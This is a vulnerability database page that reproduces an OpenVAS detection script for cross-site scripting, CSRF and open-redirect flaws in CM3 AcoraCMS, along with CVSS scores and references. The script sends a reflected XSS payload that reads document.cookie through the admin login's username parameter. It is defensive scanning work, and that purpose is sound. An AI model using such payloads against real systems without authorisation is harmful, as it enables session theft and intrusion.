Lucene search
Copyright (C) 2014 Greenbone AGOPENVAS:1361412562310804268HistoryApr 29, 2014 - 12:00 a.m.
CM3 AcoraCMS Multiple XSS, CSRF and Open Redirect Vulnerabilities
2014-04-2900:00:00
Copyright (C) 2014 Greenbone AG
plugins.openvas.org
18
6.8 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
6.5 Medium
AI Score
Confidence
Low
0.036 Low
EPSS
Percentile
91.7%
CM3 AcoraCMS is prone to multiple XSS, CSRF and url redirection vulnerabilities.
# SPDX-FileCopyrightText: 2014 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.804268");
script_version("2024-06-13T05:05:46+0000");
script_cve_id("CVE-2013-4722", "CVE-2013-4723", "CVE-2013-4724", "CVE-2013-4725",
"CVE-2013-4726", "CVE-2013-4727", "CVE-2013-4728");
script_tag(name:"cvss_base", value:"6.8");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:P/I:P/A:P");
script_tag(name:"last_modification", value:"2024-06-13 05:05:46 +0000 (Thu, 13 Jun 2024)");
script_tag(name:"creation_date", value:"2014-04-29 11:10:25 +0530 (Tue, 29 Apr 2014)");
script_name("CM3 AcoraCMS Multiple XSS, CSRF and Open Redirect Vulnerabilities");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2014 Greenbone AG");
script_family("Web application abuses");
script_dependencies("find_service.nasl", "no404.nasl", "webmirror.nasl",
"DDI_Directory_Scanner.nasl", "global_settings.nasl",
"gb_microsoft_iis_http_detect.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
script_xref(name:"URL", value:"http://packetstormsecurity.com/files/122954");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/62007");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/62008");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/62009");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/62010");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/62011");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/62012");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/67701");
script_xref(name:"URL", value:"http://www.digitalsec.net/stuff/explt+advs/CM3.AcoraCMS.v6.txt");
script_tag(name:"summary", value:"CM3 AcoraCMS is prone to multiple XSS, CSRF and url redirection vulnerabilities.");
script_tag(name:"vuldetect", value:"Send a crafted data via HTTP GET request and check whether it is able
read the cookie or not.");
script_tag(name:"insight", value:"Multiple flaws are due to:
- Insufficient validation of user-supplied input via 'username', 'url', 'qstr'
passed to login/default.asp
- Insufficient validation of the 'l' parameter upon submission to track.aspx
script.
- insufficient measures for confirmation of sensitive transactions.");
script_tag(name:"impact", value:"Successful exploitation will allow attackers to redirect victim from the
intended legitimate web site to an arbitrary web site, trick the users into
performing an unspecified action in the context of their session with the
application and execute arbitrary script code in a user's browser session
in context of an affected site.");
script_tag(name:"affected", value:"CM3 Acora CMS 6.0.6/1a, 6.0.2/1a, 5.5.7/12b, 5.5.0/1b-p1, and possibly other
versions");
script_tag(name:"solution", value:"No known solution was made available for at least one year
since the disclosure of this vulnerability. Likely none will be provided anymore. General solution
options are to upgrade to a newer release, disable respective features, remove the product or
replace the product by another one.");
script_tag(name:"solution_type", value:"WillNotFix");
script_tag(name:"qod_type", value:"remote_analysis");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
include("list_array_func.inc");
cmsPort = http_get_port( default:80 );
if( ! http_can_host_asp( port:cmsPort ) ) exit( 0 );
foreach dir( make_list_unique( "/", "/AcoraCMS", "/cms", http_cgi_dirs( port:cmsPort ) ) ) {
if( dir == "/" ) dir = "";
sndReq = http_get( item:dir + "/Admin/login/default.asp", port:cmsPort );
rcvRes = http_keepalive_send_recv( port:cmsPort, data:sndReq );
if( "Welcome to the Acora CMS web-based administration" >< rcvRes ) {
url = dir + '/Admin/login/default.asp?username="</div><script>alert(document.cookie)</script>';
if( http_vuln_check( port:cmsPort, url:url, check_header:TRUE, pattern:"<script>alert\(document\.cookie\)</script>",
extra_check:">Acora CMS" ) ) {
report = http_report_vuln_url( port:cmsPort, url:url );
security_message( port:cmsPort, data:report );
exit( 0 );
}
}
}
exit( 99 );
References
packetstormsecurity.com/files/122954
www.digitalsec.net/stuff/explt+advs/CM3.AcoraCMS.v6.txt
www.securityfocus.com/bid/62007
www.securityfocus.com/bid/62008
www.securityfocus.com/bid/62009
www.securityfocus.com/bid/62010
www.securityfocus.com/bid/62011
www.securityfocus.com/bid/62012
www.securityfocus.com/bid/67701
Related
packetstorm
packetstorm
CM3 AcoraCMS XSS / CSRF / Redirection / Disclosure
2013-08-26 00:00:00
zdt
zdt
CM3 AcoraCMS XSS / CSRF / Redirection / Disclosure Vulnerabilities
2013-08-27 00:00:00
cvelist
cvelist
nvd
nvd
prion
prion
Cross site request forgery (csrf)
2014-04-25 17:12:00
Open redirect
2014-04-25 17:12:00
Session fixation
2014-06-06 14:55:00
cve
cve
6.8 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
6.5 Medium
AI Score
Confidence
Low
0.036 Low
EPSS
Percentile
91.7%
Related for OPENVAS:1361412562310804268